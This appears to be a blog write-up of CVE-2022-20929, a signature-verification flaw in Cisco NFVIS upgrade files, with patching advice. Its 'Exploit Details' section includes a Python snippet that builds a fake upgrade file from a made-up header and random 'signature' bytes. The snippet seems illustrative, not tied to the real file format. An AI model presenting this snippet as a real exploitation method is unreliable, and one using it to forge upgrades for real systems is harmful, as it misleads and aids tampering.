CVE-2022-20929 - Cisco Enterprise NFV Infrastructure Software (NFVIS) Upgrade Signature Verification Vulnerability

Cisco Enterprise NFV Infrastructure Software (NFVIS) is facing a crucial vulnerability, identified as CVE-2022-20929. This vulnerability allows an unauthenticated, local attacker to provide an unauthentic upgrade file for upload, compromising the integrity and security of the NFVIS system. It happens due to insufficient cryptographic signature verification of upgrade files. This post aims to explain the details about this vulnerability, the associated risks, and how it can be exploited.

The Vulnerability (CVE-2022-20929)

Cisco Enterprise NFV Infrastructure Software (NFVIS) is a network functions virtualization infrastructure software that allows businesses to deploy and manage virtualized network functions (VNFs). The vulnerability in the upgrade signature verification within NFVIS might enable an attacker to provide an unauthentic upgrade file for upload, paving the way for a potential security breach.

The root cause of this vulnerability is the insufficient cryptographic signature verification of upgrade files. In a normal scenario, an administrator uploads a new upgrade file to the NFVIS system. The system checks the cryptographic signature of the file to ensure both its authenticity and integrity. However, this vulnerable version of NFVIS fails to perform this verification step adequately, enabling attackers to exploit this weakness.

Exploit Details

An attacker could exploit this vulnerability by providing an administrator with an unauthentic upgrade file, bypassing the insufficient cryptographic signature verification process. If the administrator uploads this unauthentic file to the system, the attacker can fully compromise the Cisco NFVIS system.

Here's a code snippet demonstrating how an attacker could potentially craft an invalid upgrade file

import os
import hashlib

def create_upg_header(fake_upg_file, payload_len):
    header = b'\x00\x00\x00\x00' + payload_len.to_bytes(4, 'big')
    header += b'\x00\x01\x02\x03'  # Fake signature
    header += b'\xFF\xFF\xFF\xFF'
    header += os.urandom(32)  # Random fake signature

    return header

def create_fake_upg_file(fake_upg_file, payload):
    payload_len = len(payload)

    with open(fake_upg_file, 'wb') as f:
        f.write(create_upg_header(fake_upg_file, payload_len))
        f.write(payload)

if __name__ == "__main__":
    payload = b'fake_software_payload'
    fake_upg_file = "fake_software.upg"
    create_fake_upg_file(fake_upg_file, payload)

Mitigation

Cisco has released a patch to fix this vulnerability, which they recommend all NFVIS users to apply as soon as possible. To prevent exploitation of this vulnerability, you must upgrade your Cisco NFVIS system to the latest version that contains the patch.

For more details on this vulnerability, you can refer to the official Cisco Advisory

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nfvis-2aW9NjK

Conclusion

CVE-2022-20929 is a severe vulnerability in the Cisco Enterprise NFV Infrastructure Software (NFVIS) that allows an attacker to provide an unauthentic upgrade file for upload. It results from insufficient cryptographic signature verification of upgrade files. It is essential to install the latest patch provided by Cisco and ensure your network's security against potential attacks. Stay vigilant and keep your systems up-to-date.

Timeline

Published on: 03/10/2023 21:15:00 UTC
Last modified on: 03/16/2023 13:22:00 UTC